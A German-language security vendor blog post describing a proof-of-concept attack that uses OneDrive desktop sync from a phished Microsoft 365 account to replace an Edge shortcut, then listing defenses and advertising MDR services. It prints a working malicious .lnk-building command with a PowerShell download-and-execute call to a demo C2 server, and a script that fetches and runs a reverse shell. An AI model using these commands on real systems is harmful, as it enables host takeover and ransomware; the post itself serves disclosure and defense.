Die Vertrauenswürdigkeit der Microsoft-Cloud-Anwendungen hat zwangsläufig zu ihrer weitverbreiteten Verwendung in Cyber-Bedrohungskampagnen geführt. In den letzten Jahren hat das Forschungsteam von Eye Security zahlreiche Bedrohungen mithilfe von Microsoft-Anwendungen über den gesamten Angriffszyklus hinweg verfolgt, vom ersten Eindringen durch Phishing nach Anmeldeinformationen bis hin zur Datenexfiltration.
Aktuelle Fortschritte wie maschinelles Lernen und Computer-Vision-Technologien haben die Effektivität der E-Mail-Sicherheit erhöht. Daher nutzen Bedrohungsakteure neue Methoden, um an die Microsoft-Anmeldeinformationen der Benutzer zu kommen.
Diese Anmeldeinformationen werden häufig verwendet, um Business-E-Mail-Compromise-Angriffe (BEC) zu starten. Sie können aber auch verwendet werden, um auf Cloud-Speicher wie OneDrive zuzugreifen. Dies bietet Bedrohungsakteuren zahlreiche Möglichkeiten, darunter:
- Direkter Zugriff auf wertvolle Informationen
- Ein vertrauenswürdiges Repository zur Malware-Verteilung
- Ein vertrauenswürdiger Befehls- und Kontrollkanal (C2)
- Datenexfiltration über einen vertrauenswürdigen Kanal
- Synchronisierungsmissbrauch
Es ist diese letzte Taktik, der Synchronisierungsmissbrauch, die unsere Bedrohungsforscher näher untersuchen wollten. Und wir haben einen interessanten neuen potenziellen Angriff entdeckt, über den bisher noch nie berichtet wurde. Durch die Kombination des Synchronisierungsmissbrauchs mit einer anderen bekannten Taktik, dem Ersetzen von .Ink-Dateien, kann sich ein Bedrohungsakteur schnell vom kompromittierten Konto zum kompromittierten Windows-Host bewegen und von dort aus seine Ziele erreichen.
Nachfolgend beschreiben wir diesen Proof-of-Concept-Angriff und wie Sie sich davor schützen können.
Kürzlich haben wir einen besonders heimtückischen Angriff entdeckt, bei dem Microsoft Teams zur Verbreitung von Malware genutzt wurde. Mehr zu diesem Angriff und wie Sie sich davor schützen können, erfahren Sie hier: „Microsoft Teams Phishing: die neue Bedrohung und wie man sie stoppt“.
Was ist OneDrive-Synchronisierung und wie funktioniert sie?
Wenn Sie ein Gerät in Intune registrieren und keine OneDrive-/SharePoint-Richtlinien eingerichtet haben, synchronisiert OneDrive standardmäßig den Desktop eines Benutzers automatisch mit einem OneDrive-Ordner. Dies geschieht auch, wenn sich ein Benutzer mit seinem Arbeits- oder Schulkonto bei OneDrive anmeldet.
In Abbildung 1 unten sehen Sie neben den Symbolen für die Links zu Anwendungen und Dateien einen weißen Kreis mit einem grünen Häkchen. Das bedeutet, dass sie zwischen dem Desktop des Benutzers und der OneDrive-Cloud synchronisiert werden. Zu beachten ist zudem, dass die OneDrive-Synchronisierung über die Weboberfläche Vorrang vor anderen Synchronisierungsmethoden hat. Das bedeutet folgendes: Wenn ein Benutzer mit mehreren Geräten arbeitet und eine Datei mit demselben Namen in die Webversion von OneDrive hochlädt, wird diese Datei auch auf jedem anderen Gerät hochgeladen und ersetzt. Ein Benutzer kann wählen, ob er die Datei ersetzen oder unter einem anderen Namen speichern möchte. Informationen zu den von Microsoft zugewiesenen Symbolen finden Sie auf der Microsoft-Support-Site.
Proof-of-Concept-Phasen
Für unseren Proof of Concept gehen wir davon aus, dass der Zielbenutzer bereits Opfer eines Phishing-Angriffs wurde und der Bedrohungsakteur Zugriff auf sein Microsoft 365-Konto hat. Das Ziel besteht darin, den Windows-Host des Zielbenutzers zu kompromittieren und dessen Daten zu verschlüsseln, indem mithilfe der OneDrive-Synchronisierung eine Verknüpfungsdatei auf dem Desktop des Benutzers durch eine bösartige Datei ersetzt wird.
Lassen Sie uns untersuchen, wie ein Bedrohungsakteur dabei vorgehen könnte. Wir beginnen mit der OneDrive-Seite des Zielbenutzers, um zu sehen, welche Informationen wir finden können.
Von der Standard-Startseite aus können wir auf der linken Seite des Bildschirms den Abschnitt „My Files“ aufrufen, wo wir alle Ordner und Dateien sehen, die auf seinem OneDrive synchronisiert werden. Wir könnten sämtliche Daten auf OneDrive exfiltrieren und stehlen, unser Ziel besteht jedoch darin, den Host zu kompromittieren und Malware oder Ransomware direkt darauf auszuführen. Schauen wir uns den Ordner „Desktop“ an.
Unser Zielbenutzer hat einige Verknüpfungsdateien, die wir ersetzen können. Wir wählen „Microsoft Edge.lnk“, da es wahrscheinlich ist, dass er diesen Browser zu Beginn seines Arbeitstages öffnet.
Erstellen der neuen Verknüpfungsdatei
Um eine Verknüpfungsdatei zu erstellen, verwenden wir ein Tool namens „mklnk“. Wir führen den folgenden Befehl aus, um einen bösartigen Link zu erstellen:
python2 lnk.py "Microsoft Edge.lnk" "C:\Windows\System32\cmd.exe" -w "C:\Windows\Temp" -i "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -a "/k \"(C:\PROGRA~2\Microsoft\Edge\Application\msedge.exe & powershell -command \"Write-Output 'Microsoft Edge is updating...'; IEX (iwr -UseBasicParsing 'http://192.168.139.133:1337/rollout.ps1')\")\""
Hier ist eine Aufschlüsselung des Befehls:
Argumente |
Erläuterung |
Microsoft Edge.lnk |
Name der Verknüpfungsdatei, die wir erstellen. |
C:\Windows\System32\cmd.exe |
Programm, das im Hintergrund aufgerufen wird. |
-w "C:\Windows\Temp" |
Das Arbeitsverzeichnis. Wir möchten im Verzeichnis „Windows/Temp“ arbeiten, da dieses Verzeichnis normalerweise über Lese-/Schreibrechte verfügt. |
-i "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" |
Das Symbol, das verwendet wird. |
-a "/k \"(C:\PROGRA~2\Microsoft\Edge\Application\msedge.exe & powershell -command\"Write-Output 'Microsoft Edge is updating...'; IEX (iwr –UseBasicParsing 'http://192.168.139.133:1337/rollout.ps1')\")\"" |
Die böswilligen Argumente, die wir der Verknüpfungsdatei geben. Wobei 192.168.139.133 unser Demo-C2-Server ist. |
Beachten Sie, dass wir alle diese Argumente ändern können. Wenn der Benutzer beispielsweise Chrome verwendet, müssen wir lediglich den Pfad und den Namen der ausführbaren Chrome-Datei ändern.
Wenn die Datei ausgeführt wird, geschieht Folgendes:
- Damit der Zielbenutzer keinen Verdacht schöpft, rufen wir die ursprüngliche ausführbare Datei von Edge auf. Für den Benutzer sieht es so aus, als würde ein Edge-Browser geöffnet.
- Wir rufen PowerShell auf und zeigen auf dem Bildschirm an, dass Edge aktualisiert wird. So wird unser Zielbenutzer einbezogen, damit er davon ausgeht, dass alles in Ordnung ist.
- Wir rufen eine PowerShell-Datei auf, die unsere Reverse-Shell enthält, und laden sie herunter. Dadurch erhalten wir Kontrolle über den Host des Zielbenutzers.
Vorbereitung des Angriffs
Bevor wir die .Ink-Datei des Edge-Browsers ersetzen, bereiten wir den Rest unseres Angriffs vor. Zuerst richten wir einen einfachen HTTP-Server ein, laden die Shell hoch und initiieren einen Netcat-Listener, der darauf wartet, dass unser Zielbenutzer auf die ersetzte Edge-Verknüpfung klickt. Wir erstellen ein Skript, das uns Zugriff auf den Host des Zielbenutzers gewährt, wenn dieser auf die Verknüpfung klickt. Das Skript lädt unsere Reverse-Shell herunter und führt sie aus. Diese haben wir mit einem Projekt namens Sn1r/Nim-Reverse-Shell kompiliert.
Powershell file (rollout.ps1):
$url = "http://192.168.139.133:1337/allspark.exe"
$outpath = "$env:TEMP/allspark.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
Start-Process -Filepath "$env:TEMP/allspark.exe"
Nun, da alles bereit ist, können wir den Netcat-Listener zusammen mit dem einfachen HTTP-Server einrichten, damit er das Skript herunterladen kann, wenn der Zielbenutzer auf die neue .Ink-Datei des Edge-Browsers klickt.
Schließlich laden wir die schädliche .Ink-Datei hoch und lassen sie von OneDrive mit dem Desktop des Benutzers synchronisieren.
Wenn wir dazu aufgefordert werden, weisen wir OneDrive an, sie zu ersetzen.
Ausführung des Angriffs
Nun warten wir darauf, dass der Zielbenutzer auf die Edge-Verknüpfung klickt.
Der Benutzer klickt und unser Skript wird ausgeführt, wodurch wir Zugriff auf seinen Windows-Host erhalten.
Obwohl es einige Anzeichen dafür gibt, dass etwas Ungewöhnliches passiert ist, ist es höchst unwahrscheinlich, dass unser Zielbenutzer weiß, dass sein Host kompromittiert wurde. Unten auf dem Bildschirm, in der Taskleiste, sehen Sie zwei Edge-Symbole. Eine davon ist unsere getarnte cmd.exe, die dem Benutzer beim Klicken das Befehlszeilenfenster anzeigt. Natürlich gibt dem Benutzer das nicht viele Informationen, da es lediglich besagt, dass Edge aktualisiert wird.
Wenn wir den Task-Manager öffnen, können wir unseren Backdoor-Prozess sehen. Da wir bekannte Schadsoftware verwendet haben, wurde sie von Microsoft Defender erkannt, da eine entsprechende Signatur vorhanden war. Ein erfahrener Bedrohungsakteur könnte einen komplexeren Angriff durchführen, der von Standard-Antivirusprogrammen nicht erkannt würde.
So schützen Sie sich vor diesem Angriff
Es gibt eine Reihe von Maßnahmen, die Sie ergreifen können, um sich besser vor dieser Art von Angriffen zu schützen. Nachfolgend finden Sie die wirksamsten.
Änderung der OneDrive-Richtlinie, um die Synchronisierung von Verknüpfungsdateien zu blockieren
Sie können verhindern, dass Verknüpfungsdateien vom Desktop eines Benutzers mit OneDrive synchronisiert werden, indem Sie die Richtlinie im SharePoint Admin Center ändern. Gehen Sie zu Einstellungen -> OneDrive-Synchronisierung -> Upload bestimmter Dateitypen blockieren -> Aktivieren Sie das Kontrollkästchen. Dadurch wird verhindert, dass Benutzer ihre Verknüpfungsdateien mit OneDrive synchronisieren. Beachten Sie, dass dies das Hochladen von Verknüpfungsdateien über die Weboberfläche nicht verhindert. Daher empfehlen wir außerdem, dass Dateien nur von Geräten synchronisiert werden können, die in die Domäne eingebunden sind.
Diese Richtlinie verhindert nur die Synchronisierung vom Host zu OneDrive, nicht umgekehrt. Ein Bedrohungsakteur kann weiterhin eine Verknüpfungsdatei in den mit OneDrive synchronisierten Desktop-Ordner eines Benutzers hochladen. Diese wird dann mit dem Host synchronisiert und erscheint an der ersten leeren Stelle auf dessen Desktop. Dies stellt immer noch ein Risiko dar, da der Zielbenutzer in unserem Proof of Concept möglicherweise ein doppeltes Symbol nicht bemerkt und auf das neue bösartige Symbol klickt.
Abbildung 14. Ändern der OneDrive-Richtlinie
Sofern Microsoft keine Möglichkeit implementiert, das Hochladen von Verknüpfungsdateien über die Weboberfläche zu verhindern, lässt sich dies nicht anders verhindern.
Durchführung von regelmäßigen Benutzeraufklärungs- und Phishing-Simulationen
Für Unternehmen ist es von entscheidender Bedeutung, eine Kultur des Sicherheitsbewusstseins zu schaffen. Schulen Sie die Benutzer darin, ungewöhnliches Verhalten auf ihren Computern zu erkennen, und stellen Sie sicher, dass sie wissen, wie sie ihre Sicherheits- oder IT-Abteilung benachrichtigen, wenn seltsame Dinge erscheinen oder ungewöhnliche Aktivitäten stattfinden.
In unserem Szenario wurde der Benutzer Opfer eines Phishing-Angriffs. Es ist wichtig, regelmäßig simulierte Phishing-Angriffe durchzuführen, um die Benutzer im Erkennen der Anzeichen von Phishing zu schulen.
Bereitstellen von Endpoint Detection and Response (EDR)
Wie bereits erwähnt, würde ein Angreifer, der sich die Mühe macht, einen solchen Angriff zu entwickeln, wahrscheinlich nicht auf handelsübliche Schadsoftware zurückgreifen, die einfach zu erkennen ist. Daher ist es für Unternehmen wichtig, über eine gut konfigurierte EDR-Lösung wie beispielsweise die marktführenden Lösungen CrowdStrike Falcon oder Defender for Endpoint (P2/Business) zu verfügen. Selbst bei einem raffinierten Angriff führen die Aktionen des Bedrohungsakteurs zu Verhaltensweisen, die Alarme auslösen.
Untersuchung aller Warnungen
Wenn eine EDR eine Warnung generiert, ist es wichtig, dass ein erfahrener Security Operations (SecOps)-Analyst diese untersucht. In unserem Proof of Concept blockierte die EDR böswillige Aktionen. Es sind jedoch weitere Aktionen erforderlich, um zu untersuchen, was passiert ist, wie es dazu kam, wie man es verhindern kann und wie man etwaige Überreste der Aktion/Infektion beseitigt. Wenn niemand Nachforschungen angestellt hätte, wäre die Kompromittierung des Microsoft 365-Kontos nicht entdeckt worden. Es kommt häufig vor, dass Bedrohungen wochenlang unentdeckt bleiben und ein Bedrohungsakteur während dieser Zeit weiterhin einen Angriff durchführen kann.
Sicherstellung, dass Ihr SIEM-System gut konfiguriert ist
Ein Security Information and Event Management (SIEM)-System ist ein entscheidender Bestandteil der Cybersicherheitsstrategie jedes Unternehmens. Es zentralisiert Sicherheitsdaten aus mehreren Quellen, darunter Endpunkte, Server, Cloud und Anwendungen, um die IT-Infrastruktur zu überwachen, Anomalien in Echtzeit zu erkennen und detaillierte Protokolle aller Ereignisse zu führen.
Ein gutes SIEM kann dabei helfen, sowohl bekannte als auch unbekannte Bedrohungen zu erkennen und bietet detaillierte Echtzeit-Einblicke in die lokalen und Cloud-basierten Aktivitäten. Es verwendet Korrelationsregeln und statistische Algorithmen, um verwertbare Informationen aus Ereignissen und Protokolleinträgen zu extrahieren.
Es gibt verschiedene SIEMs, die bereits über integrierte Regeln verfügen, wie LogScale, Microsoft Sentinel und Splunk.
Lizenzierung eines verwalteten Erkennungs- und Reaktionsdienstes (MDR)
Der Einsatz von Tools wie SIEM ist unerlässlich, um die Wahrscheinlichkeit zu verringern, dass ein Angreifer, der erfolgreich ein Microsoft-Konto kompromittiert hat, seinen Angriff fortsetzt. Um diese Tools optimal nutzen zu können, benötigen Sie jedoch weiterhin SecOps-Experten. Viele Unternehmen stellen fest, dass der Aufbau eines Security Operations Centers (SOC), dessen Besetzung mit Mitarbeitern und die Lizenzierung der erforderlichen Tools zu teuer sind. Daher nutzen sie Managed Security Services Dritter oder MDR-Anbieter.
MDR-Services versorgen Unternehmen jeder Größe und Branche mit einem Remote-SOC, das rund um die Uhr mit hochqualifizierten SecOps-Experten besetzt ist. Ihr Hauptziel besteht darin, bestimmte Produkte in den Infrastrukturen ihrer Kunden zu überwachen und einen laufenden Cyberangriff, der ihre primären Abwehrmaßnahmen umgangen hat, zu erkennen, darauf zu reagieren und ihn einzudämmen.
Nehmen Sie Kontakt mit uns auf, um mehr über die MDR-Dienste von Eye Security zu erfahren und wie wir uns von anderen Anbietern unterscheiden, indem wir einen erheblichen Mehrwert in Ihrem Sicherheitsprogramm bündeln.